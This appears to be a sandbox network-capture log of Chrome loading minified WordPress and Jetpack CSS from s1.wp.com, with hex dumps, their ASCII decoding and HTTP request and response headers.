                                                                                                                                                                                                                                                Data Ascii: blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-imag
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 20 66 69 67 63 61 70 74 69 6f 6e 20 69 6d 67 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 20 69 6d 67 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 20 66 69 67 63 61 70 74 69 6f 6e 20 69 6d 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 66 69 67 63
                                                                                                                                                                                                                                                Data Ascii: locks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{display:inline}.blocks-gallery-grid:not(.has-nested-images) figc
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 33 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 33 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 33 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73
                                                                                                                                                                                                                                                Data Ascii: ery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 37 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 37 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 37 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e
                                                                                                                                                                                                                                                Data Ascii: .blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-n
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 34 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 34 6e 29 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 35 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 35 6e 29 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 35 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 35 6e 29 2c 2e 62 6c 6f 63
                                                                                                                                                                                                                                                Data Ascii: as-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.bloc
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 34 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 34 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 34 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 34 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 35 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 35 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c
                                                                                                                                                                                                                                                Data Ascii: nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gal
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 61 6c 69 67 6e 72 69 67 68 74 7b 6d 61 78 2d 77 69 64 74 68 3a 34 32 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 61 6c 69 67 6e 63 65 6e 74 65 72 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 20 66 69 67 75 72 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 61 6c 69 67 6e 63 65 6e 74 65 72 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 20 66 69 67 75 72 65 7b 6a 75 73 74 69 66 79 2d 63 6f 6e
                                                                                                                                                                                                                                                Data Ascii: -block-gallery:not(.has-nested-images).alignright{max-width:420px;width:100%}.blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{justify-con
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 72 3a 62 6c 75 72 28 33 70 78 29 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 30 64 65 67 2c 23 30 30 30 20 32 30 25 2c 23 30 30 30 30 29 3b 6d 61 73 6b 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 30 64 65 67 2c 23 30 30 30 20 32 30 25 2c 23 30 30 30 30 29 3b 6d 61 78 2d 68 65 69 67 68 74 3a 34 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 20 66 69 67 75 72 65 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 30 64 65 67 2c
                                                                                                                                                                                                                                                Data Ascii: r:blur(3px);content:"";height:100%;-webkit-mask-image:linear-gradient(0deg,#000 20%,#0000);mask-image:linear-gradient(0deg,#000 20%,#0000);max-height:40%}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{background:linear-gradient(0deg,
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 3a 66 6f 63 75 73 2d 77 69 74 68 69 6e 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 20 66 69 67 75 72 65 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 3a 68 6f 76 65 72 7b 73 63 72 6f 6c 6c 62 61 72 2d 63 6f 6c 6f 72 3a 23 66 66 66 63 20 23 30 30 30 30 7d 40 6d 65 64 69 61 20 28 68 6f 76 65 72 3a 6e 6f 6e 65 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 20 66 69 67 75 72 65 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 73 63 72 6f 6c 6c 62 61 72 2d 63 6f 6c 6f 72 3a 23 66 66 66 63 20 23 30 30
                                                                                                                                                                                                                                                Data Ascii: p-block-image figcaption:focus-within,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover{scrollbar-color:#fffc #0000}@media (hover:none){.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{scrollbar-color:#fffc #00


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                2192.168.2.1149743192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:32 UTC771OUTGET /_static/??-eJxdjNsKgzAQRH/IuBgpJQ+l3xKTJWguG7Ib/H0VpLR9GTjDzIG9KkdFsAjkrmrqYS0MG0q1Lt4MmegK3xMyNExW0KtKLH80OuYBvpRLovCRZtsiylqCWmyDc/rbXOd3fk1PbR7azJPeDoasOhw=&cssminify=yes HTTP/1.1
                                                                                                                                                                                                                                                Host: s1.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Origin: https://dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC485INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                                                                Content-Length: 13827
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Last-Modified: Mon, 21 Oct 2024 16:48:39 GMT
                                                                                                                                                                                                                                                Etag: "671685e7-3603"
                                                                                                                                                                                                                                                Expires: Wed, 17 Dec 2025 17:21:41 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dca BYPASS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 1
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC884INData Raw: 2e 6a 70 2d 72 65 6c 61 74 65 64 2d 70 6f 73 74 73 2d 69 32 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 7d 2e 6a 70 2d 72 65 6c 61 74 65 64 2d 70 6f 73 74 73 2d 69 32 5f 5f 6c 69 73 74 7b 2d 2d 68 67 61 70 3a 31 72 65 6d 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 63 6f 6c 75 6d 6e 2d 67 61 70 3a 76 61 72 28 2d 2d 68 67 61 70 29 3b 72 6f 77 2d 67 61 70 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 7d 2e 6a 70 2d 72 65 6c 61 74 65 64 2d 70 6f 73 74 73 2d 69 32 5f 5f 70 6f 73 74 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 2d 62 61 73 69 73 3a
                                                                                                                                                                                                                                                Data Ascii: .jp-related-posts-i2{margin-top:1.5rem}.jp-related-posts-i2__list{--hgap:1rem;display:flex;flex-wrap:wrap;column-gap:var(--hgap);row-gap:2rem;margin:0;padding:0;list-style-type:none}.jp-related-posts-i2__post{display:flex;flex-direction:column;flex-basis:
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 67 69 6e 3a 30 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 75 6e 73 65 74 7d 2e 6a 70 2d 72 65 6c 61 74 65 64 2d 70 6f 73 74 73 2d 69 32 5f 5f 70 6f 73 74 2d 64 65 66 73 20 64 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 70 78 3b 68 65 69 67 68 74 3a 31 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 63 6c 69 70 3a 72 65 63 74 28 31 70 78 2c 31 70 78 2c 31 70 78 2c 31 70 78 29 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 6a 70 2d 72 65 6c 61 74 65 64 2d 70 6f 73 74 73 2d 69 32 5f 5f 70 6f 73 74 2d 64 65 66 73 20 64 64 7b 6d 61 72 67 69 6e 3a 30 7d 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 69 32 5b 64 61 74 61 2d 6c 61 79 6f 75 74 3d 6c 69 73 74 5d 20 2e 6a 70 2d 72 65 6c 61 74
                                                                                                                                                                                                                                                Data Ascii: gin:0;list-style-type:unset}.jp-related-posts-i2__post-defs dt{position:absolute;width:1px;height:1px;overflow:hidden;clip:rect(1px,1px,1px,1px);white-space:nowrap}.jp-related-posts-i2__post-defs dd{margin:0}.jp-relatedposts-i2[data-layout=list] .jp-relat
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 73 20 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 69 74 65 6d 73 2d 76 69 73 75 61 6c 20 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 70 6f 73 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 38 30 29 3b 2d 6d 6f 7a 2d 6f 70 61 63 69 74 79 3a 2e 38 3b 6f 70 61 63 69 74 79 3a 2e 38 7d 23 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 20 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 69 74 65 6d 73 20 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 70 6f 73 74 3a 6e 74 68 2d 63 68 69 6c 64 28 33 6e 2b 34 29 2c 23 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 20 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 69 74 65 6d 73 2d 76 69 73 75 61 6c 20 2e 6a 70 2d 72
                                                                                                                                                                                                                                                Data Ascii: s .jp-relatedposts-items-visual .jp-relatedposts-post{padding-right:20px;filter:alpha(opacity=80);-moz-opacity:.8;opacity:.8}#jp-relatedposts .jp-relatedposts-items .jp-relatedposts-post:nth-child(3n+4),#jp-relatedposts .jp-relatedposts-items-visual .jp-r
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 6f 73 74 2d 74 69 74 6c 65 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 31 30 30 29 3b 2d 6d 6f 7a 2d 6f 70 61 63 69 74 79 3a 31 3b 6f 70 61 63 69 74 79 3a 31 7d 23 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 20 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 69 74 65 6d 73 20 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 70 6f 73 74 20 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 70 6f 73 74 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 6a 70 2d 72 65 6c 61 74 65 64 70 6f
                                                                                                                                                                                                                                                Data Ascii: ost-title a{font-size:inherit;font-weight:400;text-decoration:none;filter:alpha(opacity=100);-moz-opacity:1;opacity:1}#jp-relatedposts .jp-relatedposts-items .jp-relatedposts-post .jp-relatedposts-post-title a:hover{text-decoration:underline}#jp-relatedpo
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 3a 31 30 30 25 7d 23 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 20 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 6c 69 73 74 20 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 70 6f 73 74 20 69 6d 67 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 70 6f 73 74 2d 69 6d 67 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 78 2d 77 69 64 74 68 3a 33 33 25 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 25 7d 23 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 20 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 6c 69 73 74 20 68 34 2e 6a 70 2d 72 65 6c 61 74 65 64 70 6f 73 74 73 2d 70 6f 73 74 2d 74 69 74 6c 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 36 33
                                                                                                                                                                                                                                                Data Ascii: :100%}#jp-relatedposts .jp-relatedposts-list .jp-relatedposts-post img.jp-relatedposts-post-img{float:left;overflow:hidden;max-width:33%;margin-right:3%}#jp-relatedposts .jp-relatedposts-list h4.jp-relatedposts-post-title{display:inline-block;max-width:63
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 67 2d 62 61 72 20 23 6d 61 72 6b 65 74 69 6e 67 62 61 72 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 7b 74 6f 70 3a 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 61 64 6d 69 6e 2d 62 61 72 2d 2d 61 63 74 75 61 6c 2d 68 65 69 67 68 74 29 7d 62 6f 64 79 2e 61 64 6d 69 6e 2d 62 61 72 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 3e 2a 5b 69 64 5d 7b 73 63 72 6f 6c 6c 2d 6d 61 72 67 69 6e 2d 74 6f 70 3a 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 61 64 6d 69 6e 2d 62 61 72 2d 2d 68 65 69 67 68 74 29 7d 23 6d 61 72 6b 65 74 69 6e 67 62 61 72 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d
                                                                                                                                                                                                                                                Data Ascii: g-bar #marketingbar.marketing-bar{top:var(--wp-admin--admin-bar--actual-height)}body.admin-bar.has-marketing-bar .entry-content>*[id]{scroll-margin-top:var(--wp-admin--admin-bar--height)}#marketingbar.marketing-bar{display:flex;align-items:center;justify-
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 30 70 78 20 32 30 70 78 3b 77 69 64 74 68 3a 34 30 70 78 7d 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2e 69 73 2d 6a 65 74 70 61 63 6b 2d 61 70 70 2d 6c 69 6e 6b 20 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 38 70 78 7d 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 20 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 31 31 31 3b 63 6f 6c 6f 72 3a 23 66 36 66 37 66 37 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78
                                                                                                                                                                                                                                                Data Ascii: o-repeat;background-size:40px 20px;width:40px}.marketing-bar.is-jetpack-app-link .marketing-bar-text{margin-left:38px}.marketing-bar .marketing-bar-button{background:#111;color:#f6f7f7;display:inline-block;margin:0 0 0 16px;padding:8px 16px;font-size:12px
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 6f 72 65 7b 6c 65 66 74 3a 2d 32 38 70 78 3b 77 69 64 74 68 3a 32 30 70 78 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 20 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 62 75 74 74 6f 6e 7b 77 69 64 74 68 3a 31 37 70 78 3b 68 65 69 67 68 74 3a 31 37 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 75 72 6c 28 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 62 6c 6f 67 2d 70 6c 75 67 69 6e 73 2f 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2f 63 73 73 2f 2e 2e 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 2e 73 76 67 29 3b 62 61 63 6b
                                                                                                                                                                                                                                                Data Ascii: ore{left:-28px;width:20px;height:20px;background-size:20px}.marketing-bar .marketing-bar-button{width:17px;height:17px;margin:0 0 0 8px;padding:0;border:0;background:no-repeat center url(/wp-content/blog-plugins/marketing-bar/css/../images/arrow.svg);back
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 32 30 31 70 78 29 7b 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 74 68 65 6d 65 2d 64 79 61 64 20 2e 73 69 74 65 2d 62 61 6e 6e 65 72 2c 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 74 68 65 6d 65 2d 64 79 61 64 2d 32 20 2e 73 69 74 65 2d 62 61 6e 6e 65 72 7b 74 6f 70 3a 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 2d 68 65 69 67 68 74 29 7d 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 74 68 65 6d 65 2d 64 79 61 64 2e 61 64 6d 69 6e 2d 62 61 72 20 2e 73 69 74 65 2d 62 61 6e 6e 65 72 2c 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 74 68 65 6d 65 2d 64 79 61 64 2d 32 2e 61 64 6d 69 6e 2d 62 61 72 20 2e 73 69 74 65 2d 62 61 6e 6e 65 72 7b 74 6f 70 3a 63 61 6c 63 28
